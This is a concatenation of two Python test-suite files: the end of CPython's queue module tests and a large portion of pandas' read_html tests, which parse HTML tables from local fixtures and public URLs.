FailingQueueException("You Lose") return Queue._put(self, item) def _get(self): if self.fail_next_get: self.fail_next_get = False raise FailingQueueException("You Lose") return Queue._get(self) self.FailingQueue = FailingQueue super().setUp() def failing_queue_test(self, q): if q.qsize(): raise RuntimeError("Call this function with an empty queue") for i in range(QUEUE_SIZE-1): q.put(i) # Test a failing non-blocking put. q.fail_next_put = True try: q.put("oops", block=0) self.fail("The queue didn't fail when it should have") except FailingQueueException: pass q.fail_next_put = True try: q.put("oops", timeout=0.1) self.fail("The queue didn't fail when it should have") except FailingQueueException: pass q.put("last") self.assertTrue(qfull(q), "Queue should be full") # Test a failing blocking put q.fail_next_put = True try: self.do_blocking_test(q.put, ("full",), q.get, ()) self.fail("The queue didn't fail when it should have") except FailingQueueException: pass # Check the Queue isn't damaged. # put failed, but get succeeded - re-add q.put("last") # Test a failing timeout put q.fail_next_put = True try: self.do_exceptional_blocking_test(q.put, ("full", True, 10), q.get, (), FailingQueueException) self.fail("The queue didn't fail when it should have") except FailingQueueException: pass # Check the Queue isn't damaged. # put failed, but get succeeded - re-add q.put("last") self.assertTrue(qfull(q), "Queue should be full") q.get() self.assertTrue(not qfull(q), "Queue should not be full") q.put("last") self.assertTrue(qfull(q), "Queue should be full") # Test a blocking put self.do_blocking_test(q.put, ("full",), q.get, ()) # Empty it for i in range(QUEUE_SIZE): q.get() self.assertTrue(not q.qsize(), "Queue should be empty") q.put("first") q.fail_next_get = True try: q.get() self.fail("The queue didn't fail when it should have") except FailingQueueException: pass self.assertTrue(q.qsize(), "Queue should not be empty") q.fail_next_get = True try: q.get(timeout=0.1) self.fail("The queue didn't fail when it should have") except FailingQueueException: pass self.assertTrue(q.qsize(), "Queue should not be empty") q.get() self.assertTrue(not q.qsize(), "Queue should be empty") q.fail_next_get = True try: self.do_exceptional_blocking_test(q.get, (), q.put, ('empty',), FailingQueueException) self.fail("The queue didn't fail when it should have") except FailingQueueException: pass # put succeeded, but get failed. self.assertTrue(q.qsize(), "Queue should not be empty") q.get() self.assertTrue(not q.qsize(), "Queue should be empty") def test_failing_queue(self): # Test to make sure a queue is functioning correctly. # Done twice to the same instance. q = self.FailingQueue(QUEUE_SIZE) self.failing_queue_test(q) self.failing_queue_test(q) class PyFailingQueueTest(FailingQueueTest, unittest.TestCase): queue = py_queue @need_c_queue class CFailingQueueTest(FailingQueueTest, unittest.TestCase): queue = c_queue class BaseSimpleQueueTest: def setUp(self): self.q = self.type2test() def feed(self, q, seq, rnd): while True: try: val = seq.pop() except IndexError: return q.put(val) if rnd.random() > 0.5: time.sleep(rnd.random() * 1e-3) def consume(self, q, results, sentinel): while True: val = q.get() if val == sentinel: return results.append(val) def consume_nonblock(self, q, results, sentinel): while True: while True: try: val = q.get(block=False) except self.queue.Empty: time.sleep(1e-5) else: break if val == sentinel: return results.append(val) def consume_timeout(self, q, results, sentinel): while True: while True: try: val = q.get(timeout=1e-5) except self.queue.Empty: pass else: break if val == sentinel: return results.append(val) def run_threads(self, n_feeders, n_consumers, q, inputs, feed_func, consume_func): results = [] sentinel = None seq = inputs + [sentinel] * n_consumers seq.reverse() rnd = random.Random(42) exceptions = [] def log_exceptions(f): def wrapper(*args, **kwargs): try: f(*args, **kwargs) except BaseException as e: exceptions.append(e) return wrapper feeders = [threading.Thread(target=log_exceptions(feed_func), args=(q, seq, rnd)) for i in range(n_feeders)] consumers = [threading.Thread(target=log_exceptions(consume_func), args=(q, results, sentinel)) for i in range(n_consumers)] with support.start_threads(feeders + consumers): pass self.assertFalse(exceptions) self.assertTrue(q.empty()) self.assertEqual(q.qsize(), 0) return results def test_basic(self): # Basic tests for get(), put() etc. q = self.q self.assertTrue(q.empty()) self.assertEqual(q.qsize(), 0) q.put(1) self.assertFalse(q.empty()) self.assertEqual(q.qsize(), 1) q.put(2) q.put_nowait(3) q.put(4) self.assertFalse(q.empty()) self.assertEqual(q.qsize(), 4) self.assertEqual(q.get(), 1) self.assertEqual(q.qsize(), 3) self.assertEqual(q.get_nowait(), 2) self.assertEqual(q.qsize(), 2) self.assertEqual(q.get(block=False), 3) self.assertFalse(q.empty()) self.assertEqual(q.qsize(), 1) self.assertEqual(q.get(timeout=0.1), 4) self.assertTrue(q.empty()) self.assertEqual(q.qsize(), 0) with self.assertRaises(self.queue.Empty): q.get(block=False) with self.assertRaises(self.queue.Empty): q.get(timeout=1e-3) with self.assertRaises(self.queue.Empty): q.get_nowait() self.assertTrue(q.empty()) self.assertEqual(q.qsize(), 0) def test_negative_timeout_raises_exception(self): q = self.q q.put(1) with self.assertRaises(ValueError): q.get(timeout=-1) def test_order(self): # Test a pair of concurrent put() and get() q = self.q inputs = list(range(100)) results = self.run_threads(1, 1, q, inputs, self.feed, self.consume) # One producer, one consumer => results appended in well-defined order self.assertEqual(results, inputs) def test_many_threads(self): # Test multiple concurrent put() and get() N = 50 q = self.q inputs = list(range(10000)) results = self.run_threads(N, N, q, inputs, self.feed, self.consume) # Multiple consumers without synchronization append the # results in random order self.assertEqual(sorted(results), inputs) def test_many_threads_nonblock(self): # Test multiple concurrent put() and get(block=False) N = 50 q = self.q inputs = list(range(10000)) results = self.run_threads(N, N, q, inputs, self.feed, self.consume_nonblock) self.assertEqual(sorted(results), inputs) def test_many_threads_timeout(self): # Test multiple concurrent put() and get(timeout=...) N = 50 q = self.q inputs = list(range(1000)) results = self.run_threads(N, N, q, inputs, self.feed, self.consume_timeout) self.assertEqual(sorted(results), inputs) def test_references(self): # The queue should lose references to each item as soon as # it leaves the queue. class C: pass N = 20 q = self.q for i in range(N): q.put(C()) for i in range(N): wr = weakref.ref(q.get()) self.assertIsNone(wr()) class PySimpleQueueTest(BaseSimpleQueueTest, unittest.TestCase): queue = py_queue def setUp(self): self.type2test = self.queue._PySimpleQueue super().setUp() @need_c_queue class CSimpleQueueTest(BaseSimpleQueueTest, unittest.TestCase): queue = c_queue def setUp(self): self.type2test = self.queue.SimpleQueue super().setUp() def test_is_default(self): self.assertIs(self.type2test, self.queue.SimpleQueue) self.assertIs(self.type2test, self.queue.SimpleQueue) def test_reentrancy(self): # bpo-14976: put() may be called reentrantly in an asynchronous # callback. q = self.q gen = itertools.count() N = 10000 results = [] # This test exploits the fact that __del__ in a reference cycle # can be called any time the GC may run. class Circular(object): def __init__(self): self.circular = self def __del__(self): q.put(next(gen)) while True: o = Circular() q.put(next(gen)) del o results.append(q.get()) if results[-1] >= N: break self.assertEqual(results, list(range(N + 1))) if __name__ == "__main__": unittest.main()
test_html.py
from functools import partial from importlib import reload from io import BytesIO, StringIO import os from pathlib import Path import re import threading from urllib.error import URLError import numpy as np import pytest from pandas.compat import is_platform_windows from pandas.errors import ParserError import pandas.util._test_decorators as td from pandas import ( DataFrame, MultiIndex, Series, Timestamp, date_range, read_csv, to_datetime, ) import pandas._testing as tm from pandas.io.common import file_path_to_url import pandas.io.html from pandas.io.html import read_html HERE = os.path.dirname(__file__) @pytest.fixture( params=[ "chinese_utf-16.html", "chinese_utf-32.html", "chinese_utf-8.html", "letz_latin1.html", ] ) def html_encoding_file(request, datapath): """Parametrized fixture for HTML encoding test filenames.""" return datapath("io", "data", "html_encoding", request.param) def assert_framelist_equal(list1, list2, *args, **kwargs): assert len(list1) == len(list2), ( "lists are not of equal size " f"len(list1) == {len(list1)}, " f"len(list2) == {len(list2)}" ) msg = "not all list elements are DataFrames" both_frames = all( map( lambda x, y: isinstance(x, DataFrame) and isinstance(y, DataFrame), list1, list2, ) ) assert both_frames, msg for frame_i, frame_j in zip(list1, list2): tm.assert_frame_equal(frame_i, frame_j, *args, **kwargs) assert not frame_i.empty, "frames are both empty" @td.skip_if_no("bs4") def test_bs4_version_fails(monkeypatch, datapath): import bs4 monkeypatch.setattr(bs4, "__version__", "4.2") with pytest.raises(ImportError, match="Pandas requires version"): read_html(datapath("io", "data", "html", "spam.html"), flavor="bs4") def test_invalid_flavor(): url = "google.com" flavor = "invalid flavor" msg = r"\{" + flavor + r"\} is not a valid set of flavors" with pytest.raises(ValueError, match=msg): read_html(url, match="google", flavor=flavor) @td.skip_if_no("bs4") @td.skip_if_no("lxml") def test_same_ordering(datapath): filename = datapath("io", "data", "html", "valid_markup.html") dfs_lxml = read_html(filename, index_col=0, flavor=["lxml"]) dfs_bs4 = read_html(filename, index_col=0, flavor=["bs4"]) assert_framelist_equal(dfs_lxml, dfs_bs4) @pytest.mark.parametrize( "flavor", [ pytest.param("bs4", marks=td.skip_if_no("bs4")), pytest.param("lxml", marks=td.skip_if_no("lxml")), ], scope="class", ) class TestReadHtml: @pytest.fixture(autouse=True) def set_files(self, datapath): self.spam_data = datapath("io", "data", "html", "spam.html") self.spam_data_kwargs = {} self.spam_data_kwargs["encoding"] = "UTF-8" self.banklist_data = datapath("io", "data", "html", "banklist.html") @pytest.fixture(autouse=True, scope="function") def set_defaults(self, flavor, request): self.read_html = partial(read_html, flavor=flavor) yield def test_to_html_compat(self): df = ( tm.makeCustomDataframe( 4, 3, data_gen_f=lambda *args: np.random.rand(), c_idx_names=False, r_idx_names=False, ) .applymap("{:.3f}".format) .astype(float) ) out = df.to_html() res = self.read_html(out, attrs={"class": "dataframe"}, index_col=0)[0] tm.assert_frame_equal(res, df) @pytest.mark.xfail(reason="Html file was removed") @tm.network def test_banklist_url_positional_match(self): url = "https://www.fdic.gov/bank/individual/failed/banklist.html" # Passing match argument as positional should cause a FutureWarning. with tm.assert_produces_warning(FutureWarning): df1 = self.read_html( url, "First Federal Bank of Florida", attrs={"id": "table"} ) with tm.assert_produces_warning(FutureWarning): df2 = self.read_html(url, "Metcalf Bank", attrs={"id": "table"}) assert_framelist_equal(df1, df2) @pytest.mark.xfail(reason="Html file was removed") @tm.network def test_banklist_url(self): url = "https://www.fdic.gov/bank/individual/failed/banklist.html" df1 = self.read_html( url, match="First Federal Bank of Florida", attrs={"id": "table"} ) df2 = self.read_html(url, match="Metcalf Bank", attrs={"id": "table"}) assert_framelist_equal(df1, df2) @tm.network def test_spam_url(self): url = ( "https://raw.githubusercontent.com/pandas-dev/pandas/master/" "pandas/tests/io/data/html/spam.html" ) df1 = self.read_html(url, match=".*Water.*") df2 = self.read_html(url, match="Unit") assert_framelist_equal(df1, df2) @pytest.mark.slow def test_banklist(self): df1 = self.read_html( self.banklist_data, match=".*Florida.*", attrs={"id": "table"} ) df2 = self.read_html( self.banklist_data, match="Metcalf Bank", attrs={"id": "table"} ) assert_framelist_equal(df1, df2) def test_spam(self): df1 = self.read_html(self.spam_data, match=".*Water.*") df2 = self.read_html(self.spam_data, match="Unit") assert_framelist_equal(df1, df2) assert df1[0].iloc[0, 0] == "Proximates" assert df1[0].columns[0] == "Nutrient" def test_spam_no_match(self): dfs = self.read_html(self.spam_data) for df in dfs: assert isinstance(df, DataFrame) def test_banklist_no_match(self): dfs = self.read_html(self.banklist_data, attrs={"id": "table"}) for df in dfs: assert isinstance(df, DataFrame) def test_spam_header(self): df = self.read_html(self.spam_data, match=".*Water.*", header=2)[0] assert df.columns[0] == "Proximates" assert not df.empty def test_skiprows_int(self): df1 = self.read_html(self.spam_data, match=".*Water.*", skiprows=1) df2 = self.read_html(self.spam_data, match="Unit", skiprows=1) assert_framelist_equal(df1, df2) def test_skiprows_range(self): df1 = self.read_html(self.spam_data, match=".*Water.*", skiprows=range(2)) df2 = self.read_html(self.spam_data, match="Unit", skiprows=range(2)) assert_framelist_equal(df1, df2) def test_skiprows_list(self): df1 = self.read_html(self.spam_data, match=".*Water.*", skiprows=[1, 2]) df2 = self.read_html(self.spam_data, match="Unit", skiprows=[2, 1]) assert_framelist_equal(df1, df2) def test_skiprows_set(self): df1 = self.read_html(self.spam_data, match=".*Water.*", skiprows={1, 2}) df2 = self.read_html(self.spam_data, match="Unit", skiprows={2, 1}) assert_framelist_equal(df1, df2) def test_skiprows_slice(self): df1 = self.read_html(self.spam_data, match=".*Water.*", skiprows=1) df2 = self.read_html(self.spam_data, match="Unit", skiprows=1) assert_framelist_equal(df1, df2) def test_skiprows_slice_short(self): df1 = self.read_html(self.spam_data, match=".*Water.*", skiprows=slice(2)) df2 = self.read_html(self.spam_data, match="Unit", skiprows=slice(2)) assert_framelist_equal(df1, df2) def test_skiprows_slice_long(self): df1 = self.read_html(self.spam_data, match=".*Water.*", skiprows=slice(2, 5)) df2 = self.read_html(self.spam_data, match="Unit", skiprows=slice(4, 1, -1)) assert_framelist_equal(df1, df2) def test_skiprows_ndarray(self): df1 = self.read_html(self.spam_data, match=".*Water.*", skiprows=np.arange(2)) df2 = self.read_html(self.spam_data, match="Unit", skiprows=np.arange(2)) assert_framelist_equal(df1, df2) def test_skiprows_invalid(self): with pytest.raises(TypeError, match=("is not a valid type for skipping rows")): self.read_html(self.spam_data, match=".*Water.*", skiprows="asdf") def test_index(self): df1 = self.read_html(self.spam_data, match=".*Water.*", index_col=0) df2 = self.read_html(self.spam_data, match="Unit", index_col=0) assert_framelist_equal(df1, df2) def test_header_and_index_no_types(self): df1 = self.read_html(self.spam_data, match=".*Water.*", header=1, index_col=0) df2 = self.read_html(self.spam_data, match="Unit", header=1, index_col=0) assert_framelist_equal(df1, df2) def test_header_and_index_with_types(self): df1 = self.read_html(self.spam_data, match=".*Water.*", header=1, index_col=0) df2 = self.read_html(self.spam_data, match="Unit", header=1, index_col=0) assert_framelist_equal(df1, df2) def test_infer_types(self): # 10892 infer_types removed df1 = self.read_html(self.spam_data, match=".*Water.*", index_col=0) df2 = self.read_html(self.spam_data, match="Unit", index_col=0) assert_framelist_equal(df1, df2) def test_string_io(self): with open(self.spam_data, **self.spam_data_kwargs) as f: data1 = StringIO(f.read()) with open(self.spam_data, **self.spam_data_kwargs) as f: data2 = StringIO(f.read()) df1 = self.read_html(data1, match=".*Water.*") df2 = self.read_html(data2, match="Unit") assert_framelist_equal(df1, df2) def test_string(self): with open(self.spam_data, **self.spam_data_kwargs) as f: data = f.read() df1 = self.read_html(data, match=".*Water.*") df2 = self.read_html(data, match="Unit") assert_framelist_equal(df1, df2) def test_file_like(self): with open(self.spam_data, **self.spam_data_kwargs) as f: df1 = self.read_html(f, match=".*Water.*") with open(self.spam_data, **self.spam_data_kwargs) as f: df2 = self.read_html(f, match="Unit") assert_framelist_equal(df1, df2) @tm.network def test_bad_url_protocol(self): with pytest.raises(URLError): self.read_html("git://github.com", match=".*Water.*") @tm.network @pytest.mark.slow def test_invalid_url(self): try: with pytest.raises(URLError): self.read_html("http://www.a23950sdfa908sd.com", match=".*Water.*") except ValueError as e: assert "No tables found" in str(e) @pytest.mark.slow def test_file_url(self): url = self.banklist_data dfs = self.read_html( file_path_to_url(os.path.abspath(url)), match="First", attrs={"id": "table"} ) assert isinstance(dfs, list) for df in dfs: assert isinstance(df, DataFrame) @pytest.mark.slow def test_invalid_table_attrs(self): url = self.banklist_data with pytest.raises(ValueError, match="No tables found"): self.read_html( url, match="First Federal Bank of Florida", attrs={"id": "tasdfable"} ) def _bank_data(self, *args, **kwargs): return self.read_html( self.banklist_data, match="Metcalf", attrs={"id": "table"}, *args, **kwargs ) @pytest.mark.slow def test_multiindex_header(self): df = self._bank_data(header=[0, 1])[0] assert isinstance(df.columns, MultiIndex) @pytest.mark.slow def test_multiindex_index(self): df = self._bank_data(index_col=[0, 1])[0] assert isinstance(df.index, MultiIndex) @pytest.mark.slow def test_multiindex_header_index(self): df = self._bank_data(header=[0, 1], index_col=[0, 1])[0] assert isinstance(df.columns, MultiIndex) assert isinstance(df.index, MultiIndex) @pytest.mark.slow def test_multiindex_header_skiprows_tuples(self): df = self._bank_data(header=[0, 1], skiprows=1)[0] assert isinstance(df.columns, MultiIndex) @pytest.mark.slow def test_multiindex_header_skiprows(self): df = self._bank_data(header=[0, 1], skiprows=1)[0] assert isinstance(df.columns, MultiIndex) @pytest.mark.slow def test_multiindex_header_index_skiprows(self): df = self._bank_data(header=[0, 1], index_col=[0, 1], skiprows=1)[0] assert isinstance(df.index, MultiIndex) assert isinstance(df.columns, MultiIndex) @pytest.mark.slow def test_regex_idempotency(self): url = self.banklist_data dfs = self.read_html( file_path_to_url(os.path.abspath(url)), match=re.compile(re.compile("Florida")), attrs={"id": "table"}, ) assert isinstance(dfs, list) for df in dfs: assert isinstance(df, DataFrame) def test_negative_skiprows(self): msg = r"\(you passed a negative value\)" with pytest.raises(ValueError, match=msg): self.read_html(self.spam_data, match="Water", skiprows=-1) @tm.network def test_multiple_matches(self): url = "https://docs.python.org/2/" dfs = self.read_html(url, match="Python") assert len(dfs) > 1 @tm.network def test_python_docs_table(self): url = "https://docs.python.org/2/" dfs = self.read_html(url, match="Python") zz = [df.iloc[0, 0][0:4] for df in dfs] assert sorted(zz) == sorted(["Repo", "What"]) def test_empty_tables(self): """ Make sure that read_html ignores empty tables. """ html = """ <table> <thead> <tr> <th>A</th> <th>B</th> </tr> </thead> <tbody> <tr> <td>1</td> <td>2</td> </tr> </tbody> </table> <table> <tbody> </tbody> </table> """ result = self.read_html(html) assert len(result) == 1 def test_multiple_tbody(self): # GH-20690 # Read all tbody tags within a single table. result = self.read_html( """<table> <thead> <tr> <th>A</th> <th>B</th> </tr> </thead> <tbody> <tr> <td>1</td> <td>2</td> </tr> </tbody> <tbody> <tr> <td>3</td> <td>4</td> </tr> </tbody> </table>""" )[0] expected = DataFrame(data=[[1, 2], [3, 4]], columns=["A", "B"]) tm.assert_frame_equal(result, expected) def test_header_and_one_column(self): """ Don't fail with bs4 when there is a header and only one column as described in issue #9178 """ result = self.read_html( """<table> <thead> <tr> <th>Header</th> </tr> </thead> <tbody> <tr> <td>first</td> </tr> </tbody> </table>""" )[0] expected = DataFrame(data={"Header": "first"}, index=[0]) tm.assert_frame_equal(result, expected) def test_thead_without_tr(self): """ Ensure parser adds <tr> within <thead> on malformed HTML. """ result = self.read_html( """<table> <thead> <tr> <th>Country</th> <th>Municipality</th> <th>Year</th> </tr> </thead> <tbody> <tr> <td>Ukraine</td> <th>Odessa</th> <td>1944</td> </tr> </tbody> </table>""" )[0] expected = DataFrame( data=[["Ukraine", "Odessa", 1944]], columns=["Country", "Municipality", "Year"], ) tm.assert_frame_equal(result, expected) def test_tfoot_read(self): """ Make sure that read_html reads tfoot, containing td or th. Ignores empty tfoot """ data_template = """<table> <thead> <tr> <th>A</th> <th>B</th> </tr> </thead> <tbody> <tr> <td>bodyA</td> <td>bodyB</td> </tr> </tbody> <tfoot> {footer} </tfoot> </table>""" expected1 = DataFrame(data=[["bodyA", "bodyB"]], columns=["A", "B"]) expected2 = DataFrame( data=[["bodyA", "bodyB"], ["footA", "footB"]], columns=["A", "B"] ) data1 = data_template.format(footer="") data2 = data_template.format(footer="<tr><td>footA</td><th>footB</th></tr>") result1 = self.read_html(data1)[0] result2 = self.read_html(data2)[0] tm.assert_frame_equal(result1, expected1) tm.assert_frame_equal(result2, expected2) def test_parse_header_of_non_string_column(self): # GH5048: if header is specified explicitly, an int column should be # parsed as int while its header is parsed as str result = self.read_html( """ <table> <tr> <td>S</td> <td>I</td> </tr> <tr> <td>text</td> <td>1944</td> </tr> </table> """, header=0, )[0] expected = DataFrame([["text", 1944]], columns=("S", "I")) tm.assert_frame_equal(result, expected) @pytest.mark.slow def test_banklist_header(self, datapath): from pandas.io.html import _remove_whitespace def try_remove_ws(x): try: return _remove_whitespace(x) except AttributeError: return x df = self.read_html(self.banklist_data, match="Metcalf", attrs={"id": "table"})[ 0 ] ground_truth = read_csv( datapath("io", "data", "csv", "banklist.csv"), converters={"Updated Date": Timestamp, "Closing Date": Timestamp}, ) assert df.shape == ground_truth.shape old = [ "First Vietnamese American BankIn Vietnamese", "Westernbank Puerto RicoEn Espanol", "R-G Premier Bank of Puerto RicoEn Espanol", "EurobankEn Espanol", "Sanderson State BankEn Espanol", "Washington Mutual Bank(Including its subsidiary Washington " "Mutual Bank FSB)", "Silver State BankEn Espanol", "AmTrade International BankEn Espanol", "Hamilton Bank, NAEn Espanol", "The Citizens Savings BankPioneer Community Bank, Inc.", ] new = [ "First Vietnamese American Bank", "Westernbank Puerto Rico", "R-G Premier Bank of Puerto Rico", "Eurobank", "Sanderson State Bank", "Washington Mutual Bank", "Silver State Bank", "AmTrade International Bank", "Hamilton Bank, NA", "The Citizens Savings Bank", ] dfnew = df.applymap(try_remove_ws).replace(old, new) gtnew = ground_truth.applymap(try_remove_ws) converted = dfnew._convert(datetime=True, numeric=True) date_cols = ["Closing Date", "Updated Date"] converted[date_cols] = converted[date_cols].apply(to_datetime) tm.assert_frame_equal(converted, gtnew) @pytest.mark.slow def test_gold_canyon(self): gc = "Gold Canyon" with open(self.banklist_data) as f: raw_text = f.read() assert gc in raw_text df = self.read_html( self.banklist_data, match="Gold Canyon", attrs={"id": "table"} )[0] assert gc in df.to_string() def test_different_number_of_cols(self): expected = self.read_html( """<table> <thead> <tr style="text-align: right;"> <th></th> <th>C_l0_g0</th> <th>C_l0_g1</th> <th>C_l0_g2</th> <th>C_l0_g3</th> <th>C_l0_g4</th> </tr> </thead> <tbody> <tr> <th>R_l0_g0</th> <td> 0.763</td> <td> 0.233</td> <td> nan</td> <td> nan</td> <td> nan</td> </tr> <tr> <th>R_l0_g1</th> <td> 0.244</td> <td> 0.285</td> <td> 0.392</td> <td> 0.137</td> <td> 0.222</td> </tr> </tbody> </table>""", index_col=0, )[0] result = self.read_html( """<table> <thead> <tr style="text-align: right;"> <th></th> <th>C_l0_g0</th> <th>C_l0_g1</th> <th>C_l0_g2</th> <th>C_l0_g3</th> <th>C_l0_g4</th> </tr> </thead> <tbody> <tr> <th>R_l0_g0</th> <td> 0.763</td> <td> 0.233</td> </tr> <tr> <th>R_l0_g1</th> <td> 0.244</td> <td> 0.285</td> <td> 0.392</td> <td> 0.137</td> <td> 0.222</td> </tr> </tbody> </table>""", index_col=0, )[0] tm.assert_frame_equal(result, expected) def test_colspan_rowspan_1(self): # GH17054 result = self.read_html( """ <table> <tr> <th>A</th> <th colspan="1">B</th> <th rowspan="1">C</th> </tr> <tr> <td>a</td> <td>b</td> <td>c</td> </tr> </table> """ )[0] expected = DataFrame([["a", "b", "c"]], columns=["A", "B", "C"]) tm.assert_frame_equal(result, expected) def test_colspan_rowspan_copy_values(self): # GH17054 # In ASCII, with lowercase letters being copies: # # X x Y Z W # A B b z C result = self.read_html( """ <table> <tr> <td colspan="2">X</td> <td>Y</td> <td rowspan="2">Z</td> <td>W</td> </tr> <tr> <td>A</td> <td colspan="2">B</td> <td>C</td> </tr> </table> """, header=0, )[0] expected = DataFrame( data=[["A", "B", "B", "Z", "C"]], columns=["X", "X.1", "Y", "Z", "W"] ) tm.assert_frame_equal(result, expected) def test_colspan_rowspan_both_not_1(self): # GH17054 # In ASCII, with lowercase letters being copies: # # A B b b C # a b b b D result = self.read_html( """ <table> <tr> <td rowspan="2">A</td> <td rowspan="2" colspan="3">B</td> <td>C</td> </tr> <tr> <td>D</td> </tr> </table> """, header=0, )[0] expected = DataFrame( data=[["A", "B", "B", "B", "D"]], columns=["A", "B", "B.1", "B.2", "C"] ) tm.assert_frame_equal(result, expected) def test_rowspan_at_end_of_row(self): # GH17054 # In ASCII, with lowercase letters being copies: # # A B # C b result = self.read_html( """ <table> <tr> <td>A</td> <td rowspan="2">B</td> </tr> <tr> <td>C</td> </tr> </table> """, header=0, )[0] expected = DataFrame(data=[["C", "B"]], columns=["A", "B"]) tm.assert_frame_equal(result, expected) def test_rowspan_only_rows(self): # GH17054 result = self.read_html( """ <table> <tr> <td rowspan="3">A</td> <td rowspan="3">B</td> </tr> </table> """, header=0, )[0] expected = DataFrame(data=[["A", "B"], ["A", "B"]], columns=["A", "B"]) tm.assert_frame_equal(result, expected) def test_header_inferred_from_rows_with_only_th(self): # GH17054 result = self.read_html( """ <table> <tr> <th>A</th> <th>B</th> </tr> <tr> <th>a</th> <th>b</th> </tr> <tr> <td>1</td> <td>2</td> </tr> </table> """ )[0] columns = MultiIndex(levels=[["A", "B"], ["a", "b"]], codes=[[0, 1], [0, 1]]) expected = DataFrame(data=[[1, 2]], columns=columns) tm.assert_frame_equal(result, expected) def test_parse_dates_list(self): df = DataFrame({"date": date_range("1/1/2001", periods=10)}) expected = df.to_html() res = self.read_html(expected, parse_dates=[1], index_col=0) tm.assert_frame_equal(df, res[0]) res = self.read_html(expected, parse_dates=["date"], index_col=0) tm.assert_frame_equal(df, res[0]) def test_parse_dates_combine(self): raw_dates = Series(date_range("1/1/2001", periods=10)) df = DataFrame( { "date": raw_dates.map(lambda x: str(x.date())), "time": raw_dates.map(lambda x: str(x.time())), } ) res = self.read_html( df.to_html(), parse_dates={"datetime": [1, 2]}, index_col=1 ) newdf = DataFrame({"datetime": raw_dates}) tm.assert_frame_equal(newdf, res[0]) def test_wikipedia_states_table(self, datapath): data = datapath("io", "data", "html", "wikipedia_states.html") assert os.path.isfile(data), f"{repr(data)} is not a file" assert os.path.getsize(data), f"{repr(data)} is an empty file" result = self.read_html(data, match="Arizona", header=1)[0] assert result.shape == (60, 12) assert "Unnamed" in result.columns[-1] assert result["sq mi"].dtype == np.dtype("float64") assert np.allclose(result.loc[0, "sq mi"], 665384.04) def test_wikipedia_states_multiindex(self, datapath): data = datapath("io", "data", "html", "wikipedia_states.html") result = self.read_html(data, match="Arizona", index_col=0)[0] assert result.shape == (60, 11) assert "Unnamed" in result.columns[-1][1] assert result.columns.nlevels == 2 assert np.allclose(result.loc["Alaska", ("Total area[2]", "sq mi")], 665384.04) def test_parser_error_on_empty_header_row(self): msg = ( r"Passed header=\[0,1\] are too many " r"rows for this multi_index of columns" ) with pytest.raises(ParserError, match=msg): self.read_html( """ <table> <thead> <tr><th></th><th></tr> <tr><th>A</th><th>B</th></tr> </thead> <tbody> <tr><td>a</td><td>b</td></tr> </tbody> </table> """, header=[0, 1], ) def test_decimal_rows(self): # GH 12907 result = self.read_html( """<html> <body> <table> <thead> <tr> <th>Header</th> </tr> </thead> <tbody> <tr> <td>1100#101</td> </tr> </tbody> </table> </body> </html>""", decimal="#", )[0] expected = DataFrame(data={"Header": 1100.101}, index=[0]) assert result["Header"].dtype == np.dtype("float64") tm.assert_frame_equal(result, expected) def test_bool_header_arg(self): # GH 6114 for arg in [True, False]: with pytest.raises(TypeError): self.read_html(self.spam_data, header=arg) def test_converters(self): # GH 13461 result = self.read_html( """<table> <thead> <tr> <th>a</th> </tr> </thead> <tbody> <tr> <td> 0.763</td> </tr> <tr> <td> 0.244</td> </tr> </tbody> </table>""", converters={"a": str}, )[0] expected = DataFrame({"a": ["0.763", "0.244"]}) tm.assert_frame_equal(result, expected) def test_na_values(self): # GH 13461 result = self.read_html( """<table> <thead> <tr> <th>a</th> </tr> </thead> <tbody> <tr> <td> 0.763</td> </tr> <tr> <td> 0.244</td> </tr> </tbody> </table>""", na_values=[0.244], )[0] expected = DataFrame({"a": [0.763, np.nan]}) tm.assert_frame_equal(result, expected) def test_keep_default_na(self): html_data = """<table> <thead> <tr> <th>a</th> </tr> </thead> <tbody> <tr> <td> N/A</td> </tr> <tr> <td> NA</td> </tr> </tbody> </table>""" expected_df = DataFrame({"a": ["N/A", "NA"]}) html_df = self.read_html(html_data, keep_default_na=False)[0] tm.assert_frame_equal(expected_df, html_df) expected_df = DataFrame({"a": [np.nan, np.nan]}) html_df = self.read_html(html_data, keep_default_na=True)[0] tm.assert_frame_equal(expected_df, html_df) def test_preserve_empty_rows(self): result = self.read_html( """ <table> <tr> <th>A</th> <th>B</th> </tr> <tr> <td>a</td> <td>b</td> </tr> <tr> <td></td> <td></td> </tr> </table> """ )[0] expected = DataFrame(data=[["a", "b"], [np.nan, np.nan]], columns=["A", "B"]) tm.assert_frame_equal(result, expected) def test_ignore_empty_rows_when_inferring_header(self): result = self.read_html( """ <table> <thead> <tr><th></th><th></tr> <tr><th>A</th><th>B</th></tr> <tr><th>a</th><th>b</th></tr> </thead> <tbody> <tr><td>1</td><td>2</td></tr> </tbody> </table> """ )[0] columns = MultiIndex(levels=[["A", "B"], ["a", "b"]], codes=[[0, 1], [0, 1]]) expected = DataFrame(data=[[1, 2]], columns=columns) tm.assert_frame_equal(result, expected) def test_multiple_header_rows(self): # Issue #13434 expected_df = DataFrame( data=[("Hillary", 68, "D"), ("Bernie", 74, "D"), ("Donald", 69, "R")] ) expected_df.columns = [ ["Unnamed: 0_level_0", "Age", "Party"], ["Name", "Unnamed: 1_level_1", "Unnamed: 2_level_1"], ] html = expected_df.to_html(index=False) html_df = self.read_html(html)[0] tm.assert_frame_equal(expected_df, html_df) def test_works_on_valid_markup(self, datapath): filename = datapath("io", "data", "html", "valid_markup.html") dfs = self.read_html(filename, index_col=0) assert isinstance(dfs, list) assert isinstance(dfs[0], DataFrame) @pytest.mark.slow def test_fallback_success(self, datapath): banklist_data = datapath("io", "data", "html", "banklist.html") self.read_html(banklist_data, match=".*Water.*", flavor=["lxml", "html5lib"]) def test_to_html_timestamp(self): rng = date_range("2000-01-01", periods=10) df = DataFrame(np.random.randn(10, 4), index=rng) result = df.to_html() assert "2000-01-01" in result @pytest.mark.parametrize( "displayed_only,exp0,exp1", [ (True, DataFrame(["foo"]), None), (False, DataFrame(["foo bar baz qux"]), DataFrame(["foo"])), ], ) def test_displayed_only(self, displayed_only, exp0, exp1): # GH 20027 data = StringIO( """<html> <body> <table> <tr> <td> foo <span style="display:none;text-align:center">bar</span> <span style="display:none">baz</span> <span style="display: none">qux</span> </td> </tr> </table> <table style="display: none"> <tr> <td>foo</td> </tr> </table> </body> </html>""" ) dfs = self.read_html(data, displayed_only=displayed_only) tm.assert_frame_equal(dfs[0], exp0) if exp1 is not None: tm.assert_frame_equal(dfs[1], exp1) else: assert len(dfs) == 1 # Should not parse hidden table def test_encode(self, html_encoding_file): base_path = os.path.basename(html_encoding_file) root = os.path.splitext(base_path)[0] _, encoding = root.split("_") 